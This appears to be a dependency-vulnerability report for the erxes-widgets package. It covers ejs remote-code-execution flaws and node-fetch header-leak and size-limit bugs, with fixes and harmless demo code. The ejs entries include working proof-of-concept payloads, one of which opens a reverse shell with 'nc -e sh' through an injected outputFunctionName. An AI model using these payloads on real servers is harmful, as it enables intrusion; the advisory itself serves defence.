high severity
- Vulnerable module: ejs
- Introduced through: ejs@2.7.4
Detailed paths
- Introduced through: erxes-widgets@erxes/erxes-widgets#5d024d42cf1abb6f88ab4f18211054515b95d17e › ejs@2.7.4
  Remediation: Upgrade to ejs@3.1.7.
Overview
ejs is a popular JavaScript templating engine.
Affected versions of this package are vulnerable to Remote Code Execution (RCE). Whatever is supplied under the settings['view options'] key of the data passed to renderFile is copied unrestricted into ejs's own render options, so an attacker who controls that object can set outputFunctionName. ejs concatenates that value directly into the generated template source (as the line `var <outputFunctionName> = __append;`), which makes it possible to inject arbitrary JavaScript that runs when the template is rendered.
Note: This vulnerability is exploitable only if attacker-controlled input already reaches the render options, for example because the server is already vulnerable to Prototype Pollution.
PoC (creation of a reverse shell). The bracketed keys in the query string are turned into a nested settings['view options'] object by a qs-style extended query parser (Express's default), and the leading `x;` and trailing `;s` make the payload parse once ejs has wrapped it in `var ... = __append;`:
http://localhost:3000/page?id=2&settings[view options][outputFunctionName]=x;process.mainModule.require('child_process').execSync('nc -e sh 127.0.0.1 1337');s
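How the injected option reaches executable code, as an added example that is not ejs's or erxes-widgets' code: it models ejs.renderFile copying settings['view options'] onto its options, the `var <outputFunctionName> = __append;` line ejs emits into the generated source, and the identifier check ejs added in 3.1.7. The template text, the query object (the nested form an extended query parser produces from the PoC URL), the `__injected` flag and the `safeLocals` helper are constructed for this example; the payload sets that flag instead of spawning a shell.

```javascript
// Added example, not code from ejs or erxes-widgets. Template text, query object,
// the __injected flag and safeLocals are constructed for the demonstration.

// The identifier check ejs added in 3.1.7; anything else in outputFunctionName is rejected.
const JS_IDENTIFIER = /^[a-zA-Z_$][0-9a-zA-Z_$]*$/;

// Constructed: what an extended (qs-style) query parser produces from the PoC URL
//   ?id=2&settings[view options][outputFunctionName]=...
// The payload sets a flag instead of running a shell command.
const ATTACKER_QUERY = {
  id: '2',
  settings: {
    'view options': {
      outputFunctionName: 'x;globalThis.__injected = true;s',
    },
  },
};

// Model of ejs.renderFile's option handling: the view engine receives the app
// settings together with the locals and shallow-copies settings['view options']
// onto its own options, so every key in that object becomes an ejs option.
function optionsFromRenderData(data) {
  const opts = {};
  if (data.settings && data.settings['view options']) {
    Object.assign(opts, data.settings['view options']);
  }
  return opts;
}

// Model of the source ejs generates for a template. The vulnerable line is the
// `var ... = __append;` string concatenation; `validate` applies the 3.1.7 check.
function buildTemplateSource(templateText, opts, validate) {
  if (validate && opts.outputFunctionName !== undefined
      && !JS_IDENTIFIER.test(opts.outputFunctionName)) {
    throw new Error('outputFunctionName is not a valid JS identifier.');
  }
  let src = '  var __output = "";\n'
    + '  function __append(s) { if (s !== undefined && s !== null) __output += s; }\n';
  if (opts.outputFunctionName) {
    // With the payload above this becomes
    //   var x;globalThis.__injected = true;s = __append;
    // "x;" closes the declaration, "s" soaks up the trailing "= __append;".
    src += '  var ' + opts.outputFunctionName + ' = __append;\n';
  }
  src += '  __append(' + JSON.stringify(templateText) + ');\n  return __output;\n';
  return src;
}

// Model of res.render('page', renderData): compile the generated source and run it.
function renderPage(templateText, renderData, { validate = false } = {}) {
  const opts = optionsFromRenderData(renderData);
  const fn = new Function(buildTemplateSource(templateText, opts, validate));
  return fn();
}

// Application-side fix that works on any ejs version: never hand a parsed request
// object to the renderer; copy only the locals the template actually needs.
function safeLocals(query) {
  return { id: String(query.id ?? '') };
}

delete globalThis.__injected;
console.log(renderPage('<p>hello</p>', ATTACKER_QUERY));        // renders normally...
console.log('payload ran:', globalThis.__injected === true);    // ...but the payload executed
try {
  renderPage('<p>hello</p>', ATTACKER_QUERY, { validate: true });
} catch (e) {
  console.log('3.1.7 check:', e.message);
}
console.log(renderPage('<p>hello</p>', safeLocals(ATTACKER_QUERY)));
```

Run it with node: the first render returns the template output and sets the flag, the validated render throws before any source is compiled, and `safeLocals` removes the path entirely because no attacker key ever reaches the options object. Upgrading ejs fixes the library; not passing request objects as render data is the change to make in the application regardless.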
Remediation
Upgrade ejs to version 3.1.7 or higher.
medium severity
- Vulnerable module: node-fetch
- Introduced through: react@16.4.2 and react-dom@16.4.2
Detailed paths
- Introduced through: erxes-widgets@erxes/erxes-widgets#5d024d42cf1abb6f88ab4f18211054515b95d17e › react@16.4.2 › fbjs@0.8.18 › isomorphic-fetch@2.2.1 › node-fetch@1.7.3
  Remediation: Upgrade to react@16.5.0.
- Introduced through: erxes-widgets@erxes/erxes-widgets#5d024d42cf1abb6f88ab4f18211054515b95d17e › react-dom@16.4.2 › fbjs@0.8.18 › isomorphic-fetch@2.2.1 › node-fetch@1.7.3
  Remediation: Upgrade to react-dom@16.5.0.
Overview
node-fetch is a light-weight module that brings window.fetch to Node.js.
Affected versions of this package are vulnerable to Information Exposure. When a request carrying a Cookie header (or other sensitive headers) receives a response with a Location header, node-fetch follows the redirect and re-sends the same headers to the new URL, even when that URL points at a different host. Sensitive headers are therefore forwarded to whatever third party the redirect names.
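The redirect step as an added example, not node-fetch's code: given the request that received a 3xx and the Location it returned, build the headers for the follow-up request, dropping credential-bearing headers when the target is not the same origin (the behaviour node-fetch 2.6.7 / 3.1.1 introduced). The same-origin rule here (scheme and host:port must match) is this example's own, stricter than any particular library's; the header list, URLs and sample headers are constructed.

```javascript
// Added example, not node-fetch's code. URLs, header values and the strict
// same-origin rule are this example's own.

// Headers that carry credentials and must not travel to another origin.
const CREDENTIAL_HEADERS = ['authorization', 'www-authenticate', 'cookie', 'cookie2'];

// Lower-case header names so lookups do not depend on how the caller spelled them.
function normalizeHeaders(headers) {
  const out = {};
  for (const [name, value] of Object.entries(headers)) out[name.toLowerCase()] = value;
  return out;
}

// Same origin means same scheme and same host:port. A downgrade from https to http
// or a redirect to another port is treated as cross-origin on purpose.
function sameOrigin(fromUrl, toUrl) {
  const from = new URL(fromUrl);
  const to = new URL(toUrl);
  return from.protocol === to.protocol && from.host === to.host;
}

// Build { url, headers } for following a redirect. Location may be relative, so it
// is resolved against the URL that issued the redirect. With stripCredentials off
// this is the vulnerable behaviour: every header goes to the new host unchanged.
function redirectHeaders(fromUrl, location, headers, { stripCredentials = true } = {}) {
  const target = new URL(location, fromUrl).toString();
  const next = normalizeHeaders(headers);
  if (stripCredentials && !sameOrigin(fromUrl, target)) {
    for (const name of CREDENTIAL_HEADERS) delete next[name];
  }
  return { url: target, headers: next };
}

// Constructed scenario: an authenticated call to api.example.com is redirected to an
// unrelated host that would happily log whatever it receives.
const ORIGINAL_URL = 'https://api.example.com/account';
const ORIGINAL_HEADERS = {
  Cookie: 'session=0123456789abcdef',
  Authorization: 'Bearer constructed-token',
  Accept: 'application/json',
};

const leaked = redirectHeaders(ORIGINAL_URL, 'https://collector.example.net/log',
  ORIGINAL_HEADERS, { stripCredentials: false });
const fixed = redirectHeaders(ORIGINAL_URL, 'https://collector.example.net/log',
  ORIGINAL_HEADERS);
const sameHost = redirectHeaders(ORIGINAL_URL, '/login', ORIGINAL_HEADERS);

console.log('vulnerable forwards cookie:', 'cookie' in leaked.headers);   // true
console.log('fixed forwards cookie:', 'cookie' in fixed.headers);         // false
console.log('same-origin keeps cookie:', 'cookie' in sameHost.headers);   // true
```

Non-credential headers such as Accept still follow the redirect in the fixed variant, so functionality is unchanged for the common case; only the headers that would let the redirect target impersonate the client are removed.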
Remediation
Upgrade node-fetch to version 2.6.7, 3.1.1 or higher.
medium severity
- Vulnerable module: node-fetch
- Introduced through: react@16.4.2 and react-dom@16.4.2
Detailed paths
- Introduced through: erxes-widgets@erxes/erxes-widgets#5d024d42cf1abb6f88ab4f18211054515b95d17e › react@16.4.2 › fbjs@0.8.18 › isomorphic-fetch@2.2.1 › node-fetch@1.7.3
  Remediation: Upgrade to react@16.5.0.
- Introduced through: erxes-widgets@erxes/erxes-widgets#5d024d42cf1abb6f88ab4f18211054515b95d17e › react-dom@16.4.2 › fbjs@0.8.18 › isomorphic-fetch@2.2.1 › node-fetch@1.7.3
  Remediation: Upgrade to react-dom@16.5.0.
Overview
node-fetch is a light-weight module that brings window.fetch to Node.js.
Affected versions of this package are vulnerable to Denial of Service. node-fetch did not honor the size option after following a redirect: the limit was not carried over to the redirected request, so when the redirected response body exceeded it no FetchError was thrown and the oversized body was read in full as if nothing had gone wrong.
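The failure mode as an added example, not node-fetch's code: it models how a fetch client builds the request it makes after a 3xx and how the body reader enforces the size option. The bug is the follow-up request being built without `size`; the `carrySize` switch shows both behaviours. FetchError, the request object, the URLs and the body chunks are all constructed here.

```javascript
// Added example, not node-fetch's code. FetchError, request, URLs and body chunks
// are constructed for the demonstration.

class FetchError extends Error {
  constructor(message, type) {
    super(message);
    this.name = 'FetchError';
    this.type = type;
  }
}

// Build the request that follows a redirect. With carrySize false the caller's
// limit is silently dropped, which is the bug; with it true the limit travels along.
function redirectRequest(request, location, { carrySize = true } = {}) {
  const next = {
    url: new URL(location, request.url).toString(),
    method: request.method,
    headers: { ...request.headers },
  };
  if (carrySize) next.size = request.size;
  return next;
}

// Read a body (here: an array of Buffers standing in for a stream) and fail as soon
// as more than `size` bytes have arrived. size undefined or 0 means unlimited, which
// is exactly what the redirected request ends up with when the option is forgotten.
function consumeBody(chunks, size, url) {
  const parts = [];
  let total = 0;
  for (const chunk of chunks) {
    total += chunk.length;
    if (size && size > 0 && total > size) {
      throw new FetchError(`content size at ${url} over limit: ${size}`, 'max-size');
    }
    parts.push(chunk);
  }
  return Buffer.concat(parts);
}

// A fetch that is redirected and then reads the redirected body with whatever limit
// the follow-up request carries.
function fetchViaRedirect(request, location, redirectedBody, options) {
  const followed = redirectRequest(request, location, options);
  return consumeBody(redirectedBody, followed.size, followed.url);
}

// Constructed scenario: the caller allowed at most 1 KiB; the redirect target sends 4 KiB.
const REQUEST = { url: 'https://files.example.com/report', method: 'GET', headers: {}, size: 1024 };
const OVERSIZED_BODY = Array.from({ length: 4 }, () => Buffer.alloc(1024, 0x41));

function tryFetch(options) {
  try {
    const body = fetchViaRedirect(REQUEST, 'https://cdn.example.com/report.bin', OVERSIZED_BODY, options);
    return { ok: true, bytes: body.length };
  } catch (e) {
    return { ok: false, error: e.name, type: e.type };
  }
}

console.log('size forgotten:', tryFetch({ carrySize: false })); // { ok: true, bytes: 4096 }
console.log('size carried:  ', tryFetch({ carrySize: true }));  // { ok: false, error: 'FetchError', type: 'max-size' }
```

The check fires on the first chunk that pushes the running total over the limit, so a hostile server cannot make the client buffer an arbitrarily large response before the error is raised; that early exit is the whole point of the size option and is what the redirected request lost.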
Remediation
Upgrade node-fetch to version 2.6.1, 3.0.0-beta.9 or higher.
medium severity
- Vulnerable module: ejs
- Introduced through: ejs@2.7.4
Detailed paths
- Introduced through: erxes-widgets@erxes/erxes-widgets#5d024d42cf1abb6f88ab4f18211054515b95d17e › ejs@2.7.4
  Remediation: Upgrade to ejs@3.1.6.
Overview
ejs is a popular JavaScript templating engine.
Affected versions of this package are vulnerable to Arbitrary Code Injection via the render and renderFile functions. If external input flows into the options parameter, an attacker is able to run arbitrary code. The affected options include filename, compileDebug, and client: with compileDebug enabled, the filename is written unescaped into the generated template source, so a filename containing a newline breaks out of its intended position and whatever follows it is executed as JavaScript when the template is rendered.
POC
// The first argument is a template string, not a path; its content is irrelevant here.
// Called with two arguments, ejs.render treats the object as both data and options,
// so filename, compileDebug and client are picked up as options.
// The newline in filename ends the line ejs writes it into, and the `finally { ... }`
// that follows attaches to the try/catch compileDebug wraps around the template code.
let ejs = require('ejs')
ejs.render('./views/test.ejs', {
  filename: '/etc/passwd\nfinally { this.global.process.mainModule.require(\'child_process\').execSync(\'touch EJS_HACKED\') }',
  compileDebug: true,
  message: 'test',
  client: true
})
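Why the PoC's filename ends in `finally`, as an added example that is not ejs's code: it models the part of the compile step the PoC abuses, the template code wrapped in try/catch and the filename appended afterwards as a `//# sourceURL=` comment without escaping. The template body, the payload (which sets a `__ejs_hacked` flag instead of running touch) and the `sanitize` check are constructed here; the real fix is upgrading ejs.

```javascript
// Added example, not ejs's code. Template body, payload flag and the sanitize
// check are constructed for the demonstration.

// Stands in for the code ejs generates for a template: build and return the output.
const TEMPLATE_BODY = '  var __output = "";\n'
  + '  __output += "<p>hello</p>";\n'
  + '  return __output;\n';

// Mirrors the PoC's filename: the newline ends the sourceURL comment, and the
// `finally` block that follows attaches to the try/catch around the template code,
// so it runs every time the compiled template is called.
const MALICIOUS_FILENAME = '/etc/passwd\nfinally { globalThis.__ejs_hacked = true }';

// Build the debug-mode source. `sanitize` is the hardened variant: a filename is a
// path, so any line terminator in it can only be there to end the comment early.
function buildDebugSource(filename, { sanitize = false } = {}) {
  if (sanitize && /[\r\n\u2028\u2029]/.test(filename)) {
    throw new Error('filename contains line terminators');
  }
  return 'try {\n'
    + TEMPLATE_BODY
    + '} catch (e) {\n  throw e;\n}\n'
    + '\n//# sourceURL=' + filename + '\n';
}

// Compile the generated source into a function and call it, as a render would.
function renderWithFilename(filename, options) {
  return new Function(buildDebugSource(filename, options))();
}

delete globalThis.__ejs_hacked;
console.log(renderWithFilename(MALICIOUS_FILENAME));                    // <p>hello</p>
console.log('payload ran:', globalThis.__ejs_hacked === true);           // true
try {
  renderWithFilename(MALICIOUS_FILENAME, { sanitize: true });
} catch (e) {
  console.log('hardened:', e.message);
}
console.log(renderWithFilename('views/test.ejs', { sanitize: true }));  // <p>hello</p>
```

Printing `buildDebugSource(MALICIOUS_FILENAME)` shows the generated code: `try { ... } catch (e) { ... }`, a comment line reading `//# sourceURL=/etc/passwd`, and then `finally { ... }` on its own line. Comments are whitespace to the parser, so the `finally` legitimately completes the try statement and the injected block runs after the template has produced its output.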
Remediation
Upgrade ejs to version 3.1.6 or higher.